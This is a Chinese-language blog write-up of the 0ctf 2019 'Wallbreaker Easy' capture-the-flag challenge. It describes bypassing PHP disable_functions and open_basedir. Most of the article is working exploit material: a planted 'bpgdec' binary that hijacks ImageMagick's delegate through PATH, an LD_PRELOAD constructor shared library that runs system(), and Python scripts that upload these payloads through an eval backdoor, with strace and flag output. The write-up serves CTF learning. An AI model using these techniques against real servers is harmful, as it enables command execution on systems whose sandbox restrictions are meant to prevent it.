<!DOCTYPE html>
<html lang="zh">
    <!-- title -->




<!-- keywords -->




<head><meta name="generator" content="Hexo 3.8.0">
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="author" content="Dawn Yang">
    <meta name="renderer" content="webkit">
    <meta name="copyright" content="Dawn Yang">
    
    <meta name="keywords" content="hexo,hexo-theme,hexo-blog">
    
    <meta name="description" content>
    <meta http-equiv="Cache-control" content="no-cache">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <title>Wallbreaker Easy · DawnYang</title>
    <style type="text/css">
    @font-face {
        font-family: 'Oswald-Regular';
        src: url("/font/Oswald-Regular.ttf");
    }

    body {
        margin: 0;
    }

    header,
    footer,
    .back-top,
    .sidebar,
    .container,
    .site-intro-meta,
    .toc-wrapper {
        display: none;
    }

    .site-intro {
        position: relative;
        z-index: 3;
        width: 100%;
        /* height: 50vh; */
        overflow: hidden;
    }

    .site-intro-placeholder {
        position: absolute;
        z-index: -2;
        top: 0;
        left: 0;
        width: calc(100% + 300px);
        height: 100%;
        background: repeating-linear-gradient(-45deg, #444 0, #444 80px, #333 80px, #333 160px);
        background-position: center center;
        transform: translate3d(-226px, 0, 0);
        animation: gradient-move 2.5s ease-out 0s infinite;
    }

    @keyframes gradient-move {
        0% {
            transform: translate3d(-226px, 0, 0);
        }
        100% {
            transform: translate3d(0, 0, 0);
        }
    }

</style>

    <link rel="preload" href="/css/style.css?v=20180824" as="style" onload="this.onload=null;this.rel='stylesheet'">
    <link rel="stylesheet" href="/css/mobile.css?v=20180824" media="(max-width: 980px)">
    
    <link rel="preload" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
    
    <!-- /*! loadCSS. [c]2017 Filament Group, Inc. MIT License */
/* This file is meant as a standalone workflow for
- testing support for link[rel=preload]
- enabling async CSS loading in browsers that do not support rel=preload
- applying rel preload css once loaded, whether supported or not.
*/ -->
<script>
(function( w ){
	"use strict";
	// rel=preload support test
	if( !w.loadCSS ){
		w.loadCSS = function(){};
	}
	// define on the loadCSS obj
	var rp = loadCSS.relpreload = {};
	// rel=preload feature support test
	// runs once and returns a function for compat purposes
	rp.support = (function(){
		var ret;
		try {
			ret = w.document.createElement( "link" ).relList.supports( "preload" );
		} catch (e) {
			ret = false;
		}
		return function(){
			return ret;
		};
	})();

	// if preload isn't supported, get an asynchronous load by using a non-matching media attribute
	// then change that media back to its intended value on load
	rp.bindMediaToggle = function( link ){
		// remember existing media attr for ultimate state, or default to 'all'
		var finalMedia = link.media || "all";

		function enableStylesheet(){
			link.media = finalMedia;
		}

		// bind load handlers to enable media
		if( link.addEventListener ){
			link.addEventListener( "load", enableStylesheet );
		} else if( link.attachEvent ){
			link.attachEvent( "onload", enableStylesheet );
		}

		// Set rel and non-applicable media type to start an async request
		// note: timeout allows this to happen async to let rendering continue in IE
		setTimeout(function(){
			link.rel = "stylesheet";
			link.media = "only x";
		});
		// also enable media after 3 seconds,
		// which will catch very old browsers (android 2.x, old firefox) that don't support onload on link
		setTimeout( enableStylesheet, 3000 );
	};

	// loop through link elements in DOM
	rp.poly = function(){
		// double check this to prevent external calls from running
		if( rp.support() ){
			return;
		}
		var links = w.document.getElementsByTagName( "link" );
		for( var i = 0; i < links.length; i++ ){
			var link = links[ i ];
			// qualify links to those with rel=preload and as=style attrs
			if( link.rel === "preload" && link.getAttribute( "as" ) === "style" && !link.getAttribute( "data-loadcss" ) ){
				// prevent rerunning on link
				link.setAttribute( "data-loadcss", true );
				// bind listeners to toggle media back
				rp.bindMediaToggle( link );
			}
		}
	};

	// if unsupported, run the polyfill
	if( !rp.support() ){
		// run once at least
		rp.poly();

		// rerun poly on an interval until onload
		var run = w.setInterval( rp.poly, 500 );
		if( w.addEventListener ){
			w.addEventListener( "load", function(){
				rp.poly();
				w.clearInterval( run );
			} );
		} else if( w.attachEvent ){
			w.attachEvent( "onload", function(){
				rp.poly();
				w.clearInterval( run );
			} );
		}
	}


	// commonjs
	if( typeof exports !== "undefined" ){
		exports.loadCSS = loadCSS;
	}
	else {
		w.loadCSS = loadCSS;
	}
}( typeof global !== "undefined" ? global : this ) );
</script>

    <link rel="icon" href="/assets/qiyu.jpg">
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js" as="script">
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js" as="script">
    <link rel="preload" href="/scripts/main.js" as="script">
    <link rel="preload" as="font" href="/font/Oswald-Regular.ttf" crossorigin>
    <link rel="preload" as="font" href="https://at.alicdn.com/t/font_327081_1dta1rlogw17zaor.woff" crossorigin>
    
    <!-- fancybox -->
    <script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.js" defer></script>
    <!-- 百度统计  -->
    
    <!-- 谷歌统计  -->
    
</head>

    
        <body class="post-body">
    
    
<header class="header">

    <div class="read-progress"></div>
    <div class="header-sidebar-menu">&#xe775;</div>
    <!-- post页的toggle banner  -->
    
    <div class="banner">
            <div class="blog-title">
                <a href="/">Keep Calm Keep Going</a>
            </div>
            <div class="post-title">
                <a href="#" class="post-name">Wallbreaker Easy</a>
            </div>
    </div>
    
    <a class="home-link" href="/">Keep Calm Keep Going</a>
</header>
    <div class="wrapper">
        <div class="site-intro" style="







height:50vh;
">
    
    <!-- 主页  -->
    
    
    <!-- 404页  -->
            
    <div class="site-intro-placeholder"></div>
    <div class="site-intro-img" style="background-image: url(/intro/post-bg.jpg)"></div>
    <div class="site-intro-meta">
        <!-- 标题  -->
        <h1 class="intro-title">
            <!-- 主页  -->
            
            Wallbreaker Easy
            <!-- 404 -->
            
        </h1>
        <!-- 副标题 -->
        <p class="intro-subtitle">
            <!-- 主页副标题  -->
            
            
            <!-- 404 -->
            
        </p>
        <!-- 文章页meta -->
        
            <div class="post-intros">
                <!-- 文章页标签  -->
                
                
                    <div class="post-intro-read">
                        <span>字数统计: <span class="post-count word-count">1.8k</span>阅读时长: <span class="post-count reading-time">8 min</span></span>
                    </div>
                
                <div class="post-intro-meta">
                    <span class="post-intro-calander iconfont-archer">&#xe676;</span>
                    <span class="post-intro-time">2019/04/06</span>
                    
                    <span id="busuanzi_container_page_pv" class="busuanzi-pv">
                        <span class="iconfont-archer">&#xe602;</span>
                        <span id="busuanzi_value_page_pv"></span>
                    </span>
                    
                    <span class="shareWrapper">
                        <span class="iconfont-archer shareIcon">&#xe71d;</span>
                        <span class="shareText">Share</span>
                        <ul class="shareList">
                            <li class="iconfont-archer share-qr" data-type="qr">&#xe75b;
                                <div class="share-qrcode"></div>
                            </li>
                            <li class="iconfont-archer" data-type="weibo">&#xe619;</li>
                            <li class="iconfont-archer" data-type="qzone">&#xe62e;</li>
                            <li class="iconfont-archer" data-type="twitter">&#xe634;</li>
                            <li class="iconfont-archer" data-type="facebook">&#xe67a;</li>
                        </ul>
                    </span>
                </div>
            </div>
        
    </div>
</div>
        <script>
 
  // get user agent
  var browser = {
    versions: function () {
      var u = window.navigator.userAgent;
      return {
        userAgent: u,
        trident: u.indexOf('Trident') > -1, //IE内核
        presto: u.indexOf('Presto') > -1, //opera内核
        webKit: u.indexOf('AppleWebKit') > -1, //苹果、谷歌内核
        gecko: u.indexOf('Gecko') > -1 && u.indexOf('KHTML') == -1, //火狐内核
        mobile: !!u.match(/AppleWebKit.*Mobile.*/), //是否为移动终端
        ios: !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/), //ios终端
        android: u.indexOf('Android') > -1 || u.indexOf('Linux') > -1, //android终端或者uc浏览器
        iPhone: u.indexOf('iPhone') > -1 || u.indexOf('Mac') > -1, //是否为iPhone或者安卓QQ浏览器
        iPad: u.indexOf('iPad') > -1, //是否为iPad
        webApp: u.indexOf('Safari') == -1, //是否为web应用程序，没有头部与底部
        weixin: u.indexOf('MicroMessenger') == -1, //是否为微信浏览器
        uc: u.indexOf('UCBrowser') > -1 //是否为android下的UC浏览器
      };
    }()
  }
  console.log("userAgent:" + browser.versions.userAgent);

  // callback
  function fontLoaded() {
    console.log('font loaded');
    if (document.getElementsByClassName('site-intro-meta')) {
      document.getElementsByClassName('intro-title')[0].classList.add('intro-fade-in');
      document.getElementsByClassName('intro-subtitle')[0].classList.add('intro-fade-in');
      var postIntros = document.getElementsByClassName('post-intros')[0]
      if (postIntros) {
        postIntros.classList.add('post-fade-in');
      }
    }
  }

  // UC不支持跨域，所以直接显示
  function asyncCb(){
    if (browser.versions.uc) {
      console.log("UCBrowser");
      fontLoaded();
    } else {
      WebFont.load({
        custom: {
          families: ['Oswald-Regular']
        },
        loading: function () {  //所有字体开始加载
          // console.log('loading');
        },
        active: function () {  //所有字体已渲染
          fontLoaded();
        },
        inactive: function () { //字体预加载失败，无效字体或浏览器不支持加载
          console.log('inactive: timeout');
          fontLoaded();
        },
        timeout: 5000 // Set the timeout to two seconds
      });
    }
  }

  function asyncErr(){
    console.warn('script load from CDN failed, will load local script')
  }

  // load webfont-loader async, and add callback function
  function async(u, cb, err) {
    var d = document, t = 'script',
      o = d.createElement(t),
      s = d.getElementsByTagName(t)[0];
    o.src = u;
    if (cb) { o.addEventListener('load', function (e) { cb(null, e); }, false); }
    if (err) { o.addEventListener('error', function (e) { err(null, e); }, false); }
    s.parentNode.insertBefore(o, s);
  }

  var asyncLoadWithFallBack = function(arr, success, reject) {
      var currReject = function(){
        reject()
        arr.shift()
        if(arr.length)
          async(arr[0], success, currReject)
        }

      async(arr[0], success, currReject)
  }

  asyncLoadWithFallBack([
    "https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js", 
    "https://cdn.bootcss.com/webfont/1.6.28/webfontloader.js",
    "/lib/webfontloader.min.js"
  ], asyncCb, asyncErr)
</script>        
        <img class="loading" src="/assets/loading.svg" style="display: block; margin: 6rem auto 0 auto; width: 6rem; height: 6rem;" />
        <div class="container container-unloaded">
            <main class="main post-page">
    <article class="article-entry">
        <h1 id="Wallbreaker"><a href="#Wallbreaker" class="headerlink" title="Wallbreaker"></a>Wallbreaker</h1><p>0ctf 2019一道php的web题目，利用docker环境复现了一下。<br>首先进入访问题目页面给了如下的提示内容。</p>
<img src="/2019/04/06/Wallbreaker-Easy/2019/04/06/Wallbreaker-Easy/图片1.png" title="Wallbreaker Easy">
<p>从这张图片中我们可以提取到几条有用的信息</p>
<ul>
<li>题目可能是要我们绕过php的disable_function</li>
<li>服务器上安装了imagick</li>
<li>获取flag需要执行readflag命令</li>
<li>php设置了open basedir限制可读写路径</li>
<li>好像已经预设了一个后门在这里</li>
</ul>
<p>首先根据提示尝试是不是真的存在后门，果然是存在后门的。</p>
<blockquote>
<p>backdoor=phpinfo();</p>
</blockquote>
<img src="/2019/04/06/Wallbreaker-Easy/2019/04/06/Wallbreaker-Easy/图片2.png" title="Wallbreaker Easy">
<p>继续查看phpinfo中的有用信息，可以看到他的disable_function列表，open base_dir路径，imagick的版本信息，这些是我们需要的内容。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">disable_functions=pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,system,exec,shell_exec,popen,proc_open,passthru,symlink,link,syslog,imap_open,ld,mail</span><br><span class="line"></span><br><span class="line">open_basedir=/var/www/html:/tmp/1b5337d0c8ad813197b506146d8d503d</span><br><span class="line"></span><br><span class="line">imagick module version 3.4.3RC2</span><br><span class="line"></span><br><span class="line">Imagick using ImageMagick library versionImageMagick 6.9.7-4 Q16 x86_64 20170114 http://www.imagemagick.org</span><br></pre></td></tr></table></figure></p>
<p>版本 <strong>非常非常</strong> 的新，就不要想利用已知漏洞了，另外这么高水平的比赛应该也不会搞这样利用已知漏洞的套路。上传下载读文件都没有问题，只是我们要获取flag需要命令执行，所以我们的主要目标就是利用imagick绕过disable_function执行命令。从前有这样一片<a href="https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD" target="_blank" rel="noopener">文章</a>讲了一种绕过disable_function的方法，这道题就是它的延伸，下面讲一下我看到的两种解法。</p>
<h2 id="利用delegate"><a href="#利用delegate" class="headerlink" title="利用delegate"></a>利用delegate</h2><p>imagemagick有一个delegate特性，在/etc/ImageMagick-6/delegates.xml配置文件中可以看到当imagemagick处理图片的过程中会调用系统本地lib，比如处理bpg文件时imagemagick会调用一个叫bpgdec的应用程序，%i和%o应该是代表输入和输出的占位符。这里最关键的问题是 <strong>没有规定绝对</strong> 路径。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;delegate decode=&quot;bpg&quot; command=&quot;&amp;quot;bpgdec&amp;quot; -b 16 -o &amp;quot;%o.png&amp;quot; &amp;quot;%i&amp;quot;; /bin/mv &amp;quot;%o.png&amp;quot; &amp;quot;%o&amp;quot;&quot;/&gt;</span><br></pre></td></tr></table></figure></p>
<p>另外我们strace看一下如果解析一个bpg文件具体会执行的命令，这里hack.bpg不存在也可以。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$image = new Imagick(&apos;hack.bpg&apos;)</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">root@wall:/tmp# strace -f php delegate.php 2&gt;&amp;1 | grep bpgdec</span><br><span class="line">[pid    70] execve(&quot;/bin/sh&quot;, [&quot;sh&quot;, &quot;-c&quot;, &quot;&apos;bpgdec&apos; -b 16 -o &apos;/tmp/magick-6&quot;...], 0x5565c3503e70 /* 10 vars */ &lt;unfinished ...&gt;</span><br><span class="line">[pid    70] stat(&quot;/usr/local/sbin/bpgdec&quot;, 0x7ffe53a31720) = -1 ENOENT (No such file or directory)</span><br><span class="line">[pid    70] stat(&quot;/usr/local/bin/bpgdec&quot;, 0x7ffe53a31720) = -1 ENOENT (No such file or directory)</span><br><span class="line">[pid    70] stat(&quot;/usr/sbin/bpgdec&quot;, 0x7ffe53a31720) = -1 ENOENT (No such file or directory)</span><br><span class="line">[pid    70] stat(&quot;/usr/bin/bpgdec&quot;, 0x7ffe53a31720) = -1 ENOENT (No such file or directory)</span><br><span class="line">[pid    70] stat(&quot;/sbin/bpgdec&quot;, 0x7ffe53a31720) = -1 ENOENT (No such file or directory)</span><br><span class="line">[pid    70] stat(&quot;/bin/bpgdec&quot;, 0x7ffe53a31720) = -1 ENOENT (No such file or directory)</span><br><span class="line">[pid    70] write(2, &quot;bpgdec: not found&quot;, 17bpgdec: not found) = 17</span><br></pre></td></tr></table></figure>
<p>通过上面的trace信息可以看出，当解析一个bpg文件（Imagemagick没法自己解析的文件类型）时确实会调用系统命令执行bpgdec处理。那么我们 <strong>可以利用php修改环境变量，上传一个名叫bgpdec的恶意文件，当执行bgp解析时，系统就会调用我们准备好的文件，这样就可以拿到flag啦</strong>。</p>
<p>先写一个bpgdec读flag<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">int main()&#123;</span><br><span class="line">        system(&quot;/./readflag &gt; /tmp/1b5337d0c8ad813197b506146d8d503d/flag&quot;);</span><br><span class="line">        return 0;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">- coding:utf8 -*-</span><br><span class="line">import base64</span><br><span class="line">import requests</span><br><span class="line"></span><br><span class="line">url = &quot;http://localhost:18080/index.php&quot;</span><br><span class="line">evil = open(&quot;bpgdec&quot;, &quot;rb&quot;).read()</span><br><span class="line">evil = base64.b64encode(evil)</span><br><span class="line">php = &quot;putenv(&apos;PATH=/tmp/1b5337d0c8ad813197b506146d8d503d&apos;);&quot; \</span><br><span class="line">      &quot;file_put_contents(&apos;/tmp/1b5337d0c8ad813197b506146d8d503d/bpgdec&apos;, base64_decode(&apos;&quot; + evil + &quot;&apos;));&quot; \</span><br><span class="line">      &quot;chmod(&apos;/tmp/1b5337d0c8ad813197b506146d8d503d/bpgdec&apos;, 0777);&quot; \</span><br><span class="line">      &quot;try&#123;$image = new Imagick(&apos;hack.bpg&apos;);&#125;&quot; \</span><br><span class="line">      &quot;catch(Exception $e)&#123;echo file_get_contents(&apos;/tmp/1b5337d0c8ad813197b506146d8d503d/flag&apos;);&#125;&quot;</span><br><span class="line">data = &#123;</span><br><span class="line">    &quot;backdoor&quot;: php</span><br><span class="line">&#125;</span><br><span class="line">print requests.post(url, data=data).content</span><br></pre></td></tr></table></figure>
<p>因为hack.bpg不存在，执行到new Imagick之后的echo不会显示在页面，所以如果想要直接在一个请求里面搞定要加trycatch，这样执行之后就可以看到效果了。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&lt;!DOCTYPE html&gt;&lt;html&gt;&lt;head&gt;&lt;style&gt;.pre &#123;word-break: break-all;max-width: 500px;white-space: pre-wrap;&#125;&lt;/style&gt;&lt;/head&gt;&lt;body&gt;</span><br><span class="line">&lt;pre class=&quot;pre&quot;&gt;&lt;code&gt;Imagick is a awesome library for hackers to break `disable_functions`.</span><br><span class="line">So I installed php-imagick in the server, opened a `backdoor` for you.</span><br><span class="line">Let&apos;s try to execute `/readflag` to get the flag.</span><br><span class="line">Open basedir: /var/www/html:/tmp/1b5337d0c8ad813197b506146d8d503d</span><br><span class="line">flag&#123;PUTENVANDIMAGICKAREGOODFRIENDS&#125;</span><br><span class="line">Hint: eval($_POST[&quot;backdoor&quot;]);</span><br><span class="line">&lt;/code&gt;&lt;/pre&gt;&lt;/body&gt;</span><br></pre></td></tr></table></figure></p>
<h2 id="利用LD-PRELOAD"><a href="#利用LD-PRELOAD" class="headerlink" title="利用LD_PRELOAD"></a>利用LD_PRELOAD</h2><p>通俗地将在设置了LD_PRELOAD环境变量的系统中，启动新的进程时LD_PRELOAD中指定的so文件会被优先加载。这样如果修改了LD_PRELOAD变量就可以劫持系统函数，比如编写一个getuid到新的so，那么执行系统命令调用到getuid时就会执行我们定义的getuid而不是原始的。<br>LD_PRELOAD环境变量是进程独占的，正常这种功能可以广泛应用在热补丁场景中。<br>所以我们在不知道imagemagick的delegate特性时，可以利用LD_PRELOAD来进行。上传so是完全没有问题，但是怎么控制php启动新的进程呢？</p>
<p>原文（go.bin是假设的，实际不存在）</p>
<blockquote>
<p>比如，php 函数 goForward() 实现“前进”的功能，php 函数 goForward() 又由组成 php 解释器的 C 语言模块之一的 move.c 实现，C 模块 move.c 内部又通过调用外部程序 go.bin 实现，那么，我的 php 脚本中调用了函数 goForward()，势必启动外部程序 go.bin。</p>
</blockquote>
<p>后来作者找到了mail函数，mail函数会调用外部进程sendmail，sendmail会调用getuid函数，这样只要劫持getuid就可以达到任意命令执行的效果了。这道的disable_functions禁用了sendmail，所以有人开发出了更加具有一般性的方法—利用<strong>attribute</strong> ((__constructor__))。<br>这个东西和构造函数的特性非常地相似，当加载一个里面定义了attribute的共享库时会优先调用这个函数。剩下的就是找到一个会启动新的外部进程的php函数了，那么我们上一种利用方法的bpg应该还可以派上用场。<br>首先编译一个so，稍微改一下上一个脚本就好了。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">#define _GNU_SOURCE</span><br><span class="line">#include &lt;stdlib.h&gt;</span><br><span class="line">#include &lt;unistd.h&gt;</span><br><span class="line">#include &lt;sys/types.h&gt;</span><br><span class="line"></span><br><span class="line">__attribute__ ((__constructor__)) void angel (void)&#123;</span><br><span class="line">	    unsetenv(&quot;LD_PRELOAD&quot;);</span><br><span class="line">	        system(&quot;/./readflag &gt; /tmp/1b5337d0c8ad813197b506146d8d503d/flag&quot;);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">dawn@ubuntu:~$ gcc -c -fPIC attribute.c -o attribute</span><br><span class="line">dawn@ubuntu:~$ gcc --share attribute -o attribute.so</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"># -*- coding:utf8 -*-</span><br><span class="line">import base64</span><br><span class="line">import requests</span><br><span class="line"></span><br><span class="line">url = &quot;http://localhost:18080/index.php&quot;</span><br><span class="line">evil = open(&quot;attribute.so&quot;, &quot;rb&quot;).read()</span><br><span class="line">evil = base64.b64encode(evil)</span><br><span class="line">php = &quot;file_put_contents(&apos;/tmp/1b5337d0c8ad813197b506146d8d503d/attribute.so&apos;, base64_decode(&apos;&quot; + evil + &quot;&apos;));&quot; \</span><br><span class="line">      &quot;putenv(&apos;LD_PRELOAD=/tmp/1b5337d0c8ad813197b506146d8d503d/attribute.so&apos;);&quot; \</span><br><span class="line">      &quot;try&#123;$image = new Imagick(&apos;hack.bpg&apos;);&#125;&quot; \</span><br><span class="line">      &quot;catch(Exception $e)&#123;echo file_get_contents(&apos;/tmp/1b5337d0c8ad813197b506146d8d503d/flag&apos;);&#125;&quot;</span><br><span class="line">data = &#123;</span><br><span class="line">    &quot;backdoor&quot;: php</span><br><span class="line">&#125;</span><br><span class="line">print requests.post(url, data=data).content</span><br></pre></td></tr></table></figure>
<p>output<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&lt;!DOCTYPE html&gt;&lt;html&gt;&lt;head&gt;&lt;style&gt;.pre &#123;word-break: break-all;max-width: 500px;white-space: pre-wrap;&#125;&lt;/style&gt;&lt;/head&gt;&lt;body&gt;</span><br><span class="line">&lt;pre class=&quot;pre&quot;&gt;&lt;code&gt;Imagick is a awesome library for hackers to break `disable_functions`.</span><br><span class="line">So I installed php-imagick in the server, opened a `backdoor` for you.</span><br><span class="line">Let&apos;s try to execute `/readflag` to get the flag.</span><br><span class="line">Open basedir: /var/www/html:/tmp/1b5337d0c8ad813197b506146d8d503d</span><br><span class="line">flag&#123;PUTENVANDIMAGICKAREGOODFRIENDS&#125;</span><br><span class="line">Hint: eval($_POST[&quot;backdoor&quot;]);</span><br><span class="line">&lt;/code&gt;&lt;/pre&gt;&lt;/body&gt;</span><br></pre></td></tr></table></figure></p>

    </article>
    <!-- license  -->
    
        <div class="license-wrapper">
            <p>原文作者：<a href="http://dawnyang.vip">Dawn Yang</a>
            </p><p>原文链接：<a href="http://dawnyang.vip/2019/04/06/Wallbreaker-Easy/">http://dawnyang.vip/2019/04/06/Wallbreaker-Easy/</a>
            </p><p>发表日期：<a href="http://dawnyang.vip/2019/04/06/Wallbreaker-Easy/">April 6th 2019, 5:28:17 pm</a>
            </p><p>更新日期：<a href="http://dawnyang.vip/2019/04/06/Wallbreaker-Easy/">April 6th 2019, 5:50:58 pm</a>
            </p><p>版权声明：本文采用<a rel="license" href="http://creativecommons.org/licenses/by-nc/4.0/">知识共享署名-非商业性使用 4.0 国际许可协议</a>进行许可</p>
        </div>
    
    <!-- paginator  -->
    <ul class="post-paginator">
        <li class="next">
            
        </li>
        <li class="previous">
            
                <div class="prevSlogan">Previous Post</div>
                <a href="/2019/03/14/hello-world/" title="Hello World">
                    <div class="prevTitle">Hello World</div>
                </a>
            
        </li>
    </ul>
    <!-- 评论插件 -->
    <!-- 来必力City版安装代码 -->

<!-- City版安装代码已完成 -->
    
    
    <!-- partial('_partial/comment/changyan') -->
    <!--PC版-->


    
    

    <!-- 评论 -->
</main>
            <!-- profile -->
            
        </div>
        <footer class="footer footer-unloaded">
    <!-- social  -->
    
    <div class="social">
        
    
        
            
                <a href="mailto:dawnyangch@gmail.com" class="iconfont-archer email" title="email"></a>
            
        
    
        
            
                <a href="//github.com/dawnyang-cn" class="iconfont-archer github" target="_blank" title="github"></a>
            
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
            
                <a href="//twitter.com/DawnYang_cn" class="iconfont-archer twitter" target="_blank" title="twitter"></a>
            
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    

    </div>
    
    <!-- powered by Hexo  -->
    <div class="copyright">
        <span id="hexo-power">Powered by <a href="https://hexo.io/" target="_blank">Hexo</a></span><span class="iconfont-archer power">&#xe635;</span><span id="theme-info">theme <a href="https://github.com/fi3ework/hexo-theme-archer" target="_blank">Archer</a></span>
    </div>
    <!-- 不蒜子  -->
    
    <div class="busuanzi-container">
    
     
    <span id="busuanzi_container_site_pv">PV: <span id="busuanzi_value_site_pv"></span> :)</span>
    
    </div>
    
</footer>
    </div>
    <!-- toc -->
    
    <div class="toc-wrapper" style=
    







top:50vh;

    >
        <div class="toc-catalog">
            <span class="iconfont-archer catalog-icon">&#xe613;</span><span>CATALOG</span>
        </div>
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Wallbreaker"><span class="toc-number">1.</span> <span class="toc-text">Wallbreaker</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#利用delegate"><span class="toc-number">1.1.</span> <span class="toc-text">利用delegate</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#利用LD-PRELOAD"><span class="toc-number">1.2.</span> <span class="toc-text">利用LD_PRELOAD</span></a></li></ol></li></ol>
    </div>
    
    <div class="back-top iconfont-archer">&#xe639;</div>
    <div class="sidebar sidebar-hide">
    <ul class="sidebar-tabs sidebar-tabs-active-0">
        <li class="sidebar-tab-archives"><span class="iconfont-archer">&#xe67d;</span><span class="tab-name">Archive</span></li>
        <li class="sidebar-tab-tags"><span class="iconfont-archer">&#xe61b;</span><span class="tab-name">Tag</span></li>
        <li class="sidebar-tab-categories"><span class="iconfont-archer">&#xe666;</span><span class="tab-name">Cate</span></li>
    </ul>
    <div class="sidebar-content sidebar-content-show-archive">
          <div class="sidebar-panel-archives">
    <!-- 在ejs中将archive按照时间排序 -->
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    <div class="total-and-search">
        <div class="total-archive">
        Total : 2
        </div>
        <!-- search  -->
        
    </div>
    
    <div class="post-archive">
    
    
    
    
    <div class="archive-year"> 2019 </div>
    <ul class="year-list">
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">04/06</span><a class="archive-post-title" href="/2019/04/06/Wallbreaker-Easy/">Wallbreaker Easy</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">03/14</span><a class="archive-post-title" href="/2019/03/14/hello-world/">Hello World</a>
        </li>
    
    </ul></div>
  </div>
        <div class="sidebar-panel-tags">
    <div class="sidebar-tags-name">
    
    </div>
    <div class="iconfont-archer sidebar-tags-empty">&#xe678;</div>
    <div class="tag-load-fail" style="display: none; color: #ccc; font-size: 0.6rem;">
    缺失模块。<br>
    1、请确保node版本大于6.2<br>
    2、在博客根目录（注意不是archer根目录）执行以下命令：<br>
    <span style="color: #f75357; font-size: 1rem; line-height: 2rem;">npm i hexo-generator-json-content --save</span><br>
    3、在根目录_config.yml里添加配置：
    <pre style="color: #787878; font-size: 0.6rem;">
jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true</pre>
    </div> 
    <div class="sidebar-tags-list"></div>
</div>
        <div class="sidebar-panel-categories">
    <div class="sidebar-categories-name">
    
    </div>
    <div class="iconfont-archer sidebar-categories-empty">&#xe678;</div>
